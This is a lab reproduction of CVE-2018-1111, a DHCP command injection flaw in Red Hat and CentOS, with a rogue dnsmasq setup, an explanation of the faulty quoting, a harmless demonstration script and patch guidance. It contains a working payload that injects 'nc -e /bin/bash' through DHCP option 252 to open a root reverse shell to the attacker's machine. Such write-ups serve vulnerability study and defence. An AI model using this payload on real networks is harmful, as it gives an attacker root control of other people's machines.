DHCP command execution vulnerability CVE-2018-1111: reproduction


I. Vulnerability description

The DHCP client packages (dhclient) shipped with several Red Hat Enterprise Linux releases include a NetworkManager integration script, /etc/NetworkManager/dispatcher.d/11-dhclient, that contains a command injection flaw. A malicious DHCP server on the local network, or an attacker able to spoof DHCP responses on it, can exploit it: on a system that uses NetworkManager and obtains its network configuration via DHCP, a crafted option value is executed as arbitrary commands with root privileges.

II. Affected versions

Red Hat Enterprise Linux 6.x, 7.x

CentOS 6.x, 7.x

III. Building the reproduction environment

Test environment: attacker: Kali Linux; target: CentOS 7

  1. Configure the virtual network in host-only mode and turn off the hypervisor's own DHCP service, so that the rogue dnsmasq on Kali is the only DHCP server the target can hear.
  2. Put both the attacker and the target on that host-only network.

  

3. Set up a DHCP server on Kali (the attacker)

3.1 First configure the network on Kali (static IP address and gateway). The configuration below assumes Kali is 192.168.2.11 on eth0.

  

3.2 Create a file named dnsmasq.conf in the current directory with the following contents:

bind-interfaces
interface=eth0
except-interface=lo
# dhcp-range: the pool of addresses handed to clients, and the lease time
dhcp-range=192.168.2.20,192.168.2.30,12h
# dhcp-option: an option sent to DHCP clients; 3 = default gateway
dhcp-option=3,192.168.2.11
# 6 = DNS server address
dhcp-option=6,192.168.2.11
log-queries
# log file
log-facility=/var/log/dnsmasq.log

  

4. Exploit payload

dnsmasq -dC dnsmasq.conf --dhcp-option="252,malayke'&nc -e /bin/bash 192.168.2.11 8888 #"

Option 252 is the WPAD option (wpad-proxy-url): it gives the DHCP client a URL from which to fetch its proxy configuration. In the dnsmasq command, -d keeps the server in the foreground so the exchange can be watched, and -C selects the configuration file written above.

Option 252 lies in the private-use range of DHCP option codes; it is not defined by an RFC, but DHCP servers hand it out and WPAD-aware browsers ask for code 252 and fetch the network's proxy settings from the URL it carries. The injection itself has nothing to do with what option 252 means. NetworkManager exports every option it receives as a DHCP4_* environment variable, and the 11-dhclient dispatcher script re-exports those values by passing them through eval. The single quote right after malayke therefore closes the quoted string, & starts a new command (nc -e /bin/bash connects back to Kali with a root shell), and # comments out the rest of the line. Option 252 is simply a free-text option the client accepts and passes on unchanged; the flaw is in the script's quoting, not in the option.

  

5. Start a listener on Kali (nc listening on port 8888, the port used in the payload)

  

6. Restart the network service on the CentOS target so it requests a new lease from the rogue server; Kali receives the reverse shell, running as root.
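Why the lease renewal hands over a root shell, as an added example that is not code from the original post or from Red Hat. It is a simplified, constructed reconstruction of the re-export loop in the 11-dhclient dispatcher script: NetworkManager places each DHCP option in a DHCP4_* variable, the script pipes bash's declare output through a while read loop that emits export new_*=... lines, and evals the result. declare escapes an embedded single quote as '\'', but read without -r strips the backslash, so the quoting collapses and the rest of the attacker's value runs as a command. The declare line is written out by hand (constructed) so the block runs under plain sh, nc is replaced by a harmless variable assignment, and the names declare_line, import_options and DEMO_INJECTED are this example's own.

```shell
#!/bin/sh
# Added example, not the 11-dhclient script itself: a constructed model of its
# DHCP4_* -> new_* re-export loop, run once as shipped and once with `read -r`.

# What bash's `declare` prints for the variable NetworkManager hands the dispatcher
# when option 252 carries the payload from this post. bash escapes an embedded
# single quote as '\'' . nc is replaced by a harmless assignment so the demo
# is safe to run; the line itself is constructed for this example.
declare_line() {
    printf '%s\n' "DHCP4_WPAD_PROXY_URL='malayke'\\''&DEMO_INJECTED=\$(echo pwned) #'"
}

# Re-export DHCP4_* variables as new_* the way the dispatcher does.
# $1 is passed straight to read: "" models the vulnerable loop, "-r" the fixed one.
# Returns "<injected marker or none>|<value of new_wpad_proxy_url or unset>".
import_options() {
    DEMO_INJECTED=""
    unset new_wpad_proxy_url
    eval "$(
        declare_line | while read $1 opt; do
            optname=${opt%%=*}                       # DHCP4_WPAD_PROXY_URL
            optname=$(printf '%s' "$optname" | tr '[:upper:]' '[:lower:]')
            optname=new_${optname#dhcp4_}            # new_wpad_proxy_url
            optvalue=${opt#*=}                       # everything after the first =
            echo "export $optname=$optvalue"         # this line is what eval runs
        done
    )"
    printf '%s|%s\n' "${DEMO_INJECTED:-none}" "${new_wpad_proxy_url:-unset}"
}

printf 'read    (vulnerable): %s\n' "$(import_options "")"
printf 'read -r (fixed):      %s\n' "$(import_options -r)"
```

Run it and the vulnerable loop reports pwned while new_wpad_proxy_url is never even set, because & pushed the export itself into the background; the loop with read -r, the one-flag change carried by the patched dhclient package, imports the whole value as an inert string. Feeding untrusted data through eval at all is the deeper problem: a script that needs this should build the assignment with bash's printf %q or avoid eval entirely.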

  

IV. Mitigation

Update the DHCP client package to a fixed version:

yum -y update dhclient

After updating, confirm that /etc/NetworkManager/dispatcher.d/11-dhclient was replaced by the new package (its read loop should use read -r). Patching removes the code execution, not the rogue DHCP server: anyone on the same segment can still answer DHCP requests, so DHCP snooping on managed switches is the complementary network-side control.

Source: www.cnblogs.com/yuzly/p/11074555.html